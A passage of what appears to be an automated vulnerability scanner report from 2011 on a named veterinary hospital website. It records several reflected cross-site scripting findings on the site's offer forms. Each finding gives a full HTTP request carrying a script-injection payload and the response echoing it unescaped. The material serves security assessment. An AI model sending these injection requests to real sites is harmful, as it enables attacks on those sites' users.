GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=f8b73"><script>alert(1)</script>c6690637939&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:31 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=lutm9p0j05v6cj6vrgj8qkh9p2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
ame="uri" id="uri" value="http://www.vcahospitals.com/hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=f8b73"><script>alert(1)</script>c6690637939&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHO
...[SNIP]...

2.17. http://www.vcahospitals.com/hanson/offer.html [lname parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/hanson/offer.html

Issue detail

The value of the lname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16722"><script>alert(1)</script>2ea3b2459e0 was submitted in the lname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hanson/offer.html?addr=&captcha_code=&city=&email=&fname=&formtype=HOSPITAL&guid=007EF736-41A2-4D74-A734-EAAAE21050EB&ipaddress=173.193.214.243&js=&lname=16722"><script>alert(1)</script>2ea3b2459e0&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3dD39719BC-A5D6-477B-8C66-B259FB8EE223%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d5ec6ecf4e1a8926f777dc6f65e4b5df0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&searchtype=&state=&submit=Submit&token=4aa32e878fa8952921f99572af385fde&uri=http:%2f%2fwww.vcahospitals.com%2fhanson%2foffer.html%3faddr%3d%26captcha_code%3d%26city%3d%26email%3d%26fname%3d%26formtype%3dHOSPITAL%26guid%3d6F138DDF-04F2-48B4-9D84-48AE7EDED93E%26ipaddress%3d173.193.214.243%26js%3d%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%26searchtype%3d%26state%3d%26submit%3dSubmit%26token%3d27ef4093596737f6510022b56c9c5db0%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fhanson%252foffer.html%253faddr%253d%2526captcha_code%253d%2526city%253d%2526email%253d%2526fname%253d%2526formtype%253dHOSPITAL%2526guid%253dD39719BC-A5D6-477B-8C66-B259FB8EE223%2526ipaddress%253d173.193.214.243%2526js%253d%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%2526searchtype%253d%2526state%253d%2526submit%253dSubmit%2526token%253d5ec6ecf4e1a8926f777dc6f65e4b5df0%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fhanson%25252foffer.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:52:35 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=1o5ip8hjvq2ep4jaapvh990j72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19421

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input name="lname" id="lname" type="text" size="30" class="req" maxlength="50" value="16722"><script>alert(1)</script>2ea3b2459e0" />
...[SNIP]...

2.18. http://www.vcahospitals.com/main/offer [ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2cb5"><script>alert(1)</script>58d69b46a2b was submitted in the parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?=3d2cb5"><script>alert(1)</script>58d69b46a2b&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:17:52 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?=3d2cb5"><script>alert(1)</script>58d69b46a2b&state=FL&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.19. http://www.vcahospitals.com/main/offer [&optin parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the &optin request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98fd8"><script>alert(1)</script>96e4964cd43 was submitted in the &optin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&optin=98fd8"><script>alert(1)</script>96e4964cd43&guid=207E973A-7104-40BA-9D0B-1AC946469C69&addr=&city=&date=1307084400&email=&fname=&formtype=CORP&ipaddress=173.193.214.243&lname=&newmex=0&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f%26optin%3d%26guid%3d7FB081CC-4889-473B-8B55-80F871DF3718%26addr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3df59533da00809808fd0e36c2845bf10f%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d1%2526guid%253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=3459b82500bdac55498a24f3778782f7&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3f%26optin%3d%26guid%3d1E049255-7B8D-4495-83A3-703E71767F97%26addr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d1%2526guid%253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3db7ecd3da55c240fe68509bf0409ab225%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253f%2526optin%253d%2526guid%253d7FB081CC-4889-473B-8B55-80F871DF3718%2526addr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253df59533da00809808fd0e36c2845bf10f%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253f%252526optin%25253d1%252526guid%25253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com
Cookie: PHPSESSID=7dralunqm62g71gllr4tjahje0

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:00 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 20215

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&optin=98fd8"><script>alert(1)</script>96e4964cd43&guid=207E973A-7104-40BA-9D0B-1AC946469C69&addr=&city=&date=1307084400&email=&fname=&formtype=CORP&ipaddress=173.193.214.243&lname=&newmex=0&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fw
...[SNIP]...

2.20. http://www.vcahospitals.com/main/offer [&state parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the &state request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0508"><script>alert(1)</script>c935fdcf07e was submitted in the &state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?&state=FLf0508"><script>alert(1)</script>c935fdcf07e&guid=2505B0C6-B6AA-4144-878F-54873D353284 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer/thank-you.html?
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:16:05 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?&state=FLf0508"><script>alert(1)</script>c935fdcf07e&guid=2505B0C6-B6AA-4144-878F-54873D353284" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.21. http://www.vcahospitals.com/main/offer [addr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the addr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4e30"><script>alert(1)</script>0f7c5167de6 was submitted in the addr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=d4e30"><script>alert(1)</script>0f7c5167de6&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:15:48 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ceoonhufna4nqjnbadvlk4olp2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?addr=d4e30"><script>alert(1)</script>0f7c5167de6&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&sub
...[SNIP]...

2.22. http://www.vcahospitals.com/main/offer [city parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.vcahospitals.com
Path:	/main/offer

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5398c"><script>alert(1)</script>87df2a8d4cb was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer?addr=&city=5398c"><script>alert(1)</script>87df2a8d4cb&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
